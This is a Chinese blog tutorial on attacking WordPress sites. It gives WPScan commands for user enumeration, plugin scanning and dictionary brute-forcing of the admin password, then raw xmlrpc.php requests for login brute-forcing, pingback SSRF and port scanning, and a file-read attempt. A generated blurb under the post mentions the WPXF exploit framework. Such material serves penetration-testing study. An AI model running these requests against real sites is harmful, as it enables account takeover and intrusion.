Wordpress漏洞利用&WPscan使用

WordPress是一个开源的内容管理系统(CMS),在全球范围内使用比较广泛,当遇到一个WP站点时可以首先用WPscan进行扫描收集信息

WPscan

WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括主题漏洞、插件漏洞和WordPress本身的漏洞,在遇到wp站点时可以扫描一下

1、刺探基础信息:
wpscan --url http://www.example.com

2、猜解后台用户名
wpscan --url http://www.example.com --enumerate u

3、使用字典暴破用户名admin的密码
wpscan --url http://www.example.com -P password.txt -U admin 

4、扫描插件
wpscan --url http://www.example.com --enumerate p

5、扫描易受攻击的插件
wpscan --url http://www.example.com --enumerate vp

6、扫描所有插件
wpscan --url http://www.example.com --enumerate ap

渗透wordpress的思路:

(1)暴力破解其账户密码
    尝试top10的账号,弱口令密码
    用wpscan对用户名以及密码进行枚举等
(2)插件漏洞的破解

对其进行插件扫描:

wpscan --url http://192.168.1.72 --enumerate ap --plugins-detection aggressive

建议扫描的时候使用aggressive模式,不然有些插件扫描不出来

wordpress的主要还是从插件下手,对于识别出的插件可以在网站搜索漏洞

https://wpscan.com/search

image-20211117212948893

image-20211117213001683

之后做个脚本小子就行了,复现漏洞

xmlrpc.php

image-20211117202740901

如果网站存在xmlrpc.php,有以下几种利用方式

查看系统允许的方法

POST /xmlrpc.php HTTP/1.1
Host: example.com
Content-Length: 135

<?xml version="1.0" encoding="utf-8"?> 
<methodCall> 
<methodName>system.listMethods</methodName> 
<params></params> 
</methodCall>

暴力破解用户名

POST /xmlrpc.php HTTP/1.1
Host: example.com
Content-Length: 235

<?xml version="1.0" encoding="UTF-8"?>
<methodCall> 
<methodName>wp.getUsersBlogs</methodName> 
<params> 
<param><value>\{\{your username\}\}</value></param> 
<param><value>\{\{your password\}\}</value></param> 
</params> 
</methodCall>

image-20211117203154273

用wpscan爆破密码也是利用的xmlrpc.php

wpscan --url http://www.example.com -P password.txt -U admin 

image-20211117210122493

破解成功后可以去后台登录,登陆地址是:网站域名/wp-admin/

SSRF

WordPress 版本< 3.5.1
通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery,SSRF)和远程端口扫描

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99

<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>要探测的ip和端口:http://127.0.0.1:80</string></value>
</param><param><value><string>网站上一篇博客的URL:http://localhost/wordpress/?p=1)<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>

脚本

https://github.com/FireFart/WordpressPingbackPortScanner

读取文件

不一定成功

<?xml version="1.0" encoding="utf-8"?>
<methodCall>
<methodName>pingback.ping
</methodNmae>
<params>
<param>
<value>
<string>
file://C:\wamp64\www\htdocs\sfc\wp-includes\rss-functions.php
</string>
</value>
</param>
</params>
</methodCall>
  • 9
    点赞
  • 64
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
有很多WordPress漏洞利用工具可用于测试和利用WordPress网站的安全漏洞。其中一个工具叫做WPXF。根据引用,WPXF可以用于利用symposium_shell_upload漏洞。使用WPXF,你可以设置目标URI和主机,以便对WordPress网站进行漏洞利用。在引用中,设置了目标URI为/wordpress/,设置了主机为wp-sandbox。此外,还有其他的WordPress漏洞利用工具,比如WordpressPingbackPortScanner,它可以用于扫描WordPress网站的开放端口,以便发现潜在的安全风险。你可以在引用中找到更多关于这个工具的信息。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [一款强大的WordPress漏洞利用框架 - WPXF](https://blog.csdn.net/weixin_35779001/article/details/116177937)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [Wordpress漏洞利用&WPscan使用](https://blog.csdn.net/q20010619/article/details/121389238)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

OceanSec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值